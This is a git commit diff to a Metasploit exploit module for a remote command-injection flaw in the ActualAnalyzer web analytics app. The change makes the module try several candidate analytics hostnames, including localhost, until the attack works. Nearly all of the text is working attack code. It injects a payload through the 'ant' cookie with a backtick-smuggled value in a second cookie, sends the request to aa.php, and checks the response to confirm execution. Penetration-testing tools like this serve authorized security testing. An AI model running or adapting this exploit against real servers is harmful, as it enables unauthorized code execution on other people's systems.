Use list of potential analytics hosts

2014-12-14 23:15:41 +11:00 · 2014-12-14 23:15:41 +11:00 · 55d9e9cff6
parent f1f57c6ed9
commit 55d9e9cff6
1 changed files with 23 additions and 13 deletions
--- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
+++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
@ -209,32 +209,42 @@ class Metasploit3 < Msf::Exploit::Remote
    end
  end

-  def exploit
-    if datastore['ANALYZER_HOST'].blank?
-      analytics_host = get_analytics_host_code
-      analytics_host = get_analytics_host_view if analytics_host.nil?
-      analytics_host = get_analytics_host_admin if analytics_host.nil?
-      analytics_host = vhost if analytics_host.nil?
-    else
-      analytics_host = datastore['ANALYZER_HOST']
-    end
+  def execute_command(cmd, opts = { :analytics_host => vhost })
    vuln_cookies = %w(anw anm)
-    print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'aa.php'),
-      'vars_get' => { 'anp' => analytics_host },
-      'cookie' => "ant=#{payload.encoded}; #{vuln_cookies.sample}=#{rand(100...999)}.`$cot`"
+      'vars_get' => { 'anp' => opts[:analytics_host] },
+      'cookie' => "ant=#{cmd}; #{vuln_cookies.sample}=#{rand(100...999)}.`$cot`"
    )
    if !res
      fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out")
    elsif res.code == 302 && res.headers['Content-Type'] =~ /image/
      print_good("#{peer} - Payload sent successfully")
+      return true
    elsif res.code == 302 && res.headers['Location'] =~ /error\.gif/
-      fail_with(Failure::BadConfig, "#{peer} - Host '#{analytics_host}' is not monitored by ActualAnalyzer. set ANALYZER_HOST to specify.")
+      vprint_status("#{peer} - Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.")
    elsif res.code == 200 && res.body =~ /Admin area<\/title>/
      fail_with(Failure::Unknown, "#{peer} - ActualAnalyzer is not installed. Try installing first.")
    else
      fail_with(Failure::Unknown, "#{peer} - Something went wrong")
    end
  end
+
+  def exploit
+    analytics_hosts = []
+    if datastore['ANALYZER_HOST'].blank?
+      analytics_hosts << get_analytics_host_code
+      analytics_hosts << get_analytics_host_view
+      analytics_hosts << get_analytics_host_admin
+      analytics_hosts << vhost
+      analytics_hosts << '127.0.0.1'
+      analytics_hosts << 'localhost'
+    else
+      analytics_hosts << datastore['ANALYZER_HOST']
+    end
+    analytics_hosts.uniq.each do |host|
+      vprint_status("#{peer} - Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...")
+      break if execute_command(payload.encoded, { :analytics_host => host })
+    end
+  end
 end